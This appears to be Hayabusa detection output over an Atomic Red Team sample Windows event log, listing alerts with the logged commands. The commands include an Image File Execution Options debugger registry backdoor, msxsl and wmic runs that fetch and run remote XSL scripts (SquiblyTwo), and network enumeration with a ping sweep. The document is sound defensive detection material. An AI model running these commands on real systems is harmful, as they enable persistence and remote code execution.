+2019-07-19 23:50:17.990 +09:00,MSEDGEWIN10,13,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:17.990 +09:00,MSEDGEWIN10,13,critical,Sticky Key Like Backdoor Usage,,rules/sigma/registry_event/registry_event_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:17.990 +09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:18.009 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:19.467 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\atbroker.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:19.491 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg  add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\atbroker.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f  :  Path: C:\Windows\System32\reg.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\atbroker.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:19.516 +09:00,MSEDGEWIN10,13,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:19.516 +09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:19.549 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:25.376 +09:00,MSEDGEWIN10,3,low,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:50.046 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\Temp\msxsl.exe C:\AtomicRedTeam\atomics\T1220\src\msxslxmlfile.xml C:\AtomicRedTeam\atomics\T1220\src\msxslscript.xsl""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:50.086 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:53.011 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\Temp\msxsl.exe https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslxmlfile.xml https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslscript.xsl""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:53.062 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:55.991 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""wmic.exe process /FORMAT:list""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:56.047 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: wmic.exe  process /FORMAT:list  :  Path: C:\Windows\System32\wbem\WMIC.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""wmic.exe process /FORMAT:list""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:56.182 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:06.728 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""wmic.exe process /FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:06.753 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: wmic.exe  process /FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl  :  Path: C:\Windows\System32\wbem\WMIC.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""wmic.exe process /FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:06.753 +09:00,MSEDGEWIN10,1,medium,XSL Script Processing,,rules/sigma/process_creation/win_xsl_script_processing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:06.753 +09:00,MSEDGEWIN10,1,medium,SquiblyTwo,,rules/sigma/process_creation/win_bypass_squiblytwo.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:06.888 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:09.823 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""net view /domain""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:09.845 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: net  view /domain  :  Path: C:\Windows\System32\net.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""net view /domain""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:09.845 +09:00,MSEDGEWIN10,1,low,Net.exe Execution,,rules/sigma/process_creation/win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:09.845 +09:00,MSEDGEWIN10,1,low,Windows Network Enumeration,,rules/sigma/process_creation/win_net_enum.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:22.314 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""net view""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:22.333 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: net  view  :  Path: C:\Windows\System32\net.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""net view""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:22.333 +09:00,MSEDGEWIN10,1,low,Net.exe Execution,,rules/sigma/process_creation/win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:22.333 +09:00,MSEDGEWIN10,1,low,Windows Network Enumeration,,rules/sigma/process_creation/win_net_enum.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:34.797 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:35.014 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %%i in (1,1,254) do ping -n 1 -w 100 192.168.1.%%i""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:35.038 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.1  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:35.579 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.2  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:35.988 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.3  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:36.549 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.4  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:37.034 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.5  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:37.513 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.6  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:38.020 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.7  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:38.517 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.8  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:39.028 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.9  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:39.537 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.10  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:40.027 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.11  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:40.431 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.12  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:41.066 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.13  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:41.408 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.14  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:41.894 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.15  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:42.466 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.16  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:43.036 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.17  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:43.503 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.18  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:44.030 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.19  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:44.507 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.20  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:45.011 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.21  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:45.501 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.22  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:46.007 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.23  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:46.500 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.24  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:47.022 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.25  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:47.546 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.26  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:48.044 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.27  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:48.507 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.28  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
